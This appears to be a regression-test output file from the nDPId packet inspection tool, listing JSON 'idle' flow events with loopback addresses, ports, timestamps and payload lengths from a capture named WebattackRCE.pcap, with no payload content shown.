00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
